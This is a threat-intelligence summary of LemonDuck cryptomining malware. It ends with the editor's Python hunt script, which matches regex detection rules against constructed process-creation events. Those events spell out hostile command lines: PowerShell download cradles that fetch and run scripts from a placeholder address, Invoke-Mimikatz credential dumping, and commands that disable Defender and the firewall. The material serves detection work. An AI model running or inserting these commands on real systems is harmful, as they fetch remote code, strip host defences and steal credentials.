LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits
Essential information
- Published
- 14/10/2024 10:41
- Modified
- 14/10/2024 11:14
- Tags
- 2024-10-14, CVE-2017-0144, credential-theft, cryptomining, lemonduck, malicious scripts, network manipulation, persistence
- Related entities
- 2 vulnerabilities (cve), 8 observables, 1 intrusion set (apt), 7 techniques (mitre), 1 malware
Description
This report details the tactics and techniques used by the LemonDuck cryptomining malware, which spreads over SMB both by exploiting the EternalBlue vulnerability (CVE-2017-0144, fixed by Microsoft's MS17-010 update) and by brute-forcing credentials. Once on a host, the malware drops malicious files, disables security controls, changes network settings, and creates scheduled tasks for persistence. It then downloads additional payloads from remote URLs and uses Mimikatz to steal credentials. The analysis describes the malware's infection chain and stresses that keeping systems patched closes the exploit path (applying MS17-010, or disabling SMBv1 where it is no longer needed); patching alone does not stop the brute-force path, which needs strong, unique credentials and limited SMB exposure.
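The behaviours summarised above (scheduled-task persistence, security-control tampering, firewall changes, payload download, Mimikatz-style credential access) are all visible in process-creation telemetry. As an added example that is this editor's code rather than the report's indicators or anything taken from LemonDuck samples, the following Python hunt runs a small rule set over constructed Sysmon-style process-creation events. The sample command lines, the address 198.51.100.7 (a documentation address) and the MITRE ATT&CK mapping are assumptions made here; the report's own seven techniques are not listed on this page.

```python
"""Hunt for LemonDuck-like host behaviours in process-creation events.

Added example, not the report's code. The events below are constructed
Sysmon Event ID 1 style records; the regexes are generic indicators of the
behaviours the summary describes, not signatures of a specific sample.
"""
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry). 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = [
    # 0: scheduled task whose action is a hidden PowerShell download cradle
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": """schtasks /create /sc minute /mo 60 /tn "Updater" /tr "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')" /ru SYSTEM /f"""},
    # 1: Defender real-time protection turned off and a drive-wide exclusion added
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath C:\\"},
    # 2: host firewall disabled for every profile
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh advfirewall set allprofiles state off"},
    # 3: second-stage download followed by in-memory Mimikatz
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": """powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/m.ps1'); Invoke-Mimikatz -Command 'sekurlsa::logonpasswords'" """},
    # 4: benign activity that must not fire
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    # 5: benign scheduled task (plain executable, no script host or URL) that must not fire
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]


@dataclass(frozen=True)
class Rule:
    technique: str  # ATT&CK technique ID; this mapping is the editor's assumption
    name: str
    pattern: re.Pattern


RULES = [
    Rule("T1053.005", "Scheduled task created whose action is a script host or a URL",
         re.compile(r"schtasks(\.exe)?\s+/create\b.*?(powershell|cmd\.exe|wscript|cscript|mshta|https?://)", re.I)),
    Rule("T1105", "Download cradle / ingress tool transfer",
         re.compile(r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|certutil\b.*-urlcache|bitsadmin\b.*/transfer)", re.I)),
    Rule("T1562.001", "Defender protection disabled or exclusion added",
         re.compile(r"(Set-MpPreference\s+-Disable\w+|Add-MpPreference\s+-Exclusion\w+|DisableAntiSpyware)", re.I)),
    Rule("T1562.004", "Host firewall disabled or opened via netsh",
         re.compile(r"netsh\b.*(advfirewall|firewall)\b.*(state\s+off|add\s+rule|add\s+allowedprogram)", re.I)),
    Rule("T1003.001", "Mimikatz-style LSASS credential access",
         re.compile(r"(mimikatz|sekurlsa::|lsadump::)", re.I)),
]

# The combination the summary describes: persistence + payload download + defence tampering.
# A single rule firing is noisy on its own; the chain is what distinguishes this activity.
LEMONDUCK_CHAIN = frozenset({"T1053.005", "T1105", "T1562.001"})


def scan_event(event: dict) -> list:
    """Return the technique IDs whose rule matches this event's command line, in RULES order."""
    cmd = event.get("CommandLine", "")
    return [r.technique for r in RULES if r.pattern.search(cmd)]


def scan_events(events) -> list:
    """Return (event index, matched technique IDs) for every event that matched at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        ids = scan_event(ev)
        if ids:
            hits.append((i, ids))
    return hits


def matches_chain(events, required=LEMONDUCK_CHAIN) -> bool:
    """True when every technique in the chain was observed somewhere in the event set."""
    seen = {t for _, ids in scan_events(events) for t in ids}
    return required <= seen


if __name__ == "__main__":
    for idx, ids in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(ids)}")
    print("chain observed:", matches_chain(SAMPLE_EVENTS))
```

The rules are deliberately tied to the action of the scheduled task (a script host or URL) rather than to `schtasks /create` alone, so the benign backup task in event 5 does not fire; in a real deployment the same scoping should be applied per host, since the chain only means something when its parts occur on one machine.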